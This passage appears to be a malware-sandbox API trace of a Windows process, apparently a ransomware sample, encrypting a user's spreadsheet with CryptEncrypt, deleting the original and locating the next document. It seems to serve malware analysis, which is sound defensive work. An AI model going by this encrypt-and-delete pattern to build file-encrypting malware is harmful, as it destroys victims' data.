lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.206] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f5040*, pdwDataLen=0x144e790*=0x1a9b, dwBufLen=0x1aa0 | out: pbData=0x48f5040*, pdwDataLen=0x144e790*=0x1aa0) returned 1 [0078.206] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.206] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.206] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.206] WriteFile (in: hFile=0x298, lpBuffer=0x48f1af0*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x48f1af0*, lpNumberOfBytesWritten=0x144f194*=0x1aa0, lpOverlapped=0x0) returned 1 [0078.208] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0078.208] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca4a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0078.208] CryptDestroyKey (hKey=0x41ac140) returned 1 [0078.208] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.208] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.209] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.209] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.209] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.209] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0078.209] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0078.209] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.209] FreeLibrary (hLibModule=0x756e0000) returned 1 [0078.209] CloseHandle (hObject=0x258) returned 1 [0078.209] CloseHandle (hObject=0x298) returned 1 [0078.211] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WfOLKWjF.xlsx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\WfOLKWjF.xlsx", lpFilePart=0x0) returned 0x27 [0078.211] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\WfOLKWjF.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\wfolkwjf.xlsx")) returned 0x20 [0078.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0078.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0078.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0078.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0078.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0078.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0078.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0078.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0078.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WfOLKWjF.xlsx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56d6b00, ftCreationTime.dwHighDateTime=0x1d5b5ba, ftLastAccessTime.dwLowDateTime=0x6627ef90, ftLastAccessTime.dwHighDateTime=0x1d57c0d, ftLastWriteTime.dwLowDateTime=0x6627ef90, ftLastWriteTime.dwHighDateTime=0x1d57c0d, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="WfOLKWjF.xlsx", cAlternateFileName="WFOLKW~1.XLS")) returned 0x41ac500 [0078.212] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\WfOLKWjF.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\wfolkwjf.xlsx")) returned 1 [0078.215] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56d6b00, ftCreationTime.dwHighDateTime=0x1d5b5ba, ftLastAccessTime.dwLowDateTime=0x6627ef90, ftLastAccessTime.dwHighDateTime=0x1d57c0d, ftLastWriteTime.dwLowDateTime=0x6627ef90, ftLastWriteTime.dwHighDateTime=0x1d57c0d, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="WfOLKWjF.xlsx", cAlternateFileName="WFOLKW~1.XLS")) returned 0 [0078.216] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0078.216] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0078.216] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0078.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a82e0 | out: hHeap=0x1780000) returned 1 [0078.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0078.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0078.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0078.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0078.217] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.217] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0078.217] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0078.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0078.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0078.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0078.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7908 [0078.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0078.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0078.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0078.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0078.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0078.218] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0078.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0078.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0078.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0078.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0078.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.219] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0078.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0078.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0078.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0078.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0078.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0078.219] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\z6U2MzO.xlsx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c157d0, ftCreationTime.dwHighDateTime=0x1d565c1, ftLastAccessTime.dwLowDateTime=0x1a915610, ftLastAccessTime.dwHighDateTime=0x1d5e185, ftLastWriteTime.dwLowDateTime=0x1a915610, ftLastWriteTime.dwHighDateTime=0x1d5e185, nFileSizeHigh=0x0, nFileSizeLow=0x12d19, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="z6U2MzO.xlsx", cAlternateFileName="Z6U2MZ~1.XLS")) returned 0x41ac600 [0078.219] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0078.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0078.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0078.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0078.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0078.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0078.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0078.220] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0078.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0078.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0078.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0078.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.220] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0078.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0078.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0078.221] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0078.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0078.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0078.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0078.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c50 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0078.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0078.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0078.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0078.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0078.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0078.223] 